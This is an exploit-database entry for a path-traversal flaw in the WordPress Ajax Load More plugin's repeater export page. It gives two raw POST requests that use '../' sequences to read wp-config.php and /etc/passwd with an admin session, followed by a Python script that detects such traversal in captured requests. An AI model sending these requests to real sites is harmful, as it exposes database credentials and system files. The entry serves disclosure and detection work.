## https://sploitus.com/exploit?id=WPEX-ID:3207BBEA-B4DC-4AE0-8A48-D7089BA7107F
Read arbitrary PHP files, such as wp-config.php, with an admin+ session:

POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

alm_repeaters_export_type=a&alm_repeaters_export=1&alm_repeaters_export_name=../../../wp-config


Read arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server that does not need intermediary folders to exist, such as IIS):

POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: [admin+]

alm_repeaters_export_type=theme-repeater&alm_repeaters_export=1&alm_repeaters_export_name=../../../../../../../etc/passwd
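
For detection, the following added example (not part of the original advisory or the plugin's code) inspects a captured raw HTTP request and flags export requests to this admin page whose alm_repeaters_export_name leaves the expected template-name form. The safe-name pattern, the function names and the sample requests are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PAGE = "ajax-load-more-repeaters"   # admin page in the requests above
NAME_PARAM = "alm_repeaters_export_name"   # parameter carrying the file name
# Assumption for this example: a legitimate export name is a bare template name.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")

# Constructed samples: the first reuses the body shown above, headers trimmed.
SAMPLE_TRAVERSAL = (
    "POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "alm_repeaters_export_type=a&alm_repeaters_export=1"
    "&alm_repeaters_export_name=../../../wp-config"
)
SAMPLE_BENIGN = SAMPLE_TRAVERSAL.replace("../../../wp-config", "default")

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so the checks see the effective path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(raw):
    """Return a finding string for a suspicious export request, else None."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return None
    query = parse_qs(urlsplit(request_line[1]).query)
    if TARGET_PAGE not in query.get("page", []):
        return None
    form = parse_qs(body.strip(), keep_blank_values=True)
    if "alm_repeaters_export" not in form:
        return None
    for name in form.get(NAME_PARAM, []):
        # Treat backslashes as separators too, since IIS hosts are in scope.
        name = fully_decode(name).replace("\\", "/")
        if ".." in name.split("/"):
            return "traversal: " + name
        if not SAFE_NAME.fullmatch(name):
            return "unexpected name: " + name
    return None

if __name__ == "__main__":
    for sample in (SAMPLE_TRAVERSAL, SAMPLE_BENIGN):
        print(inspect_request(sample))
```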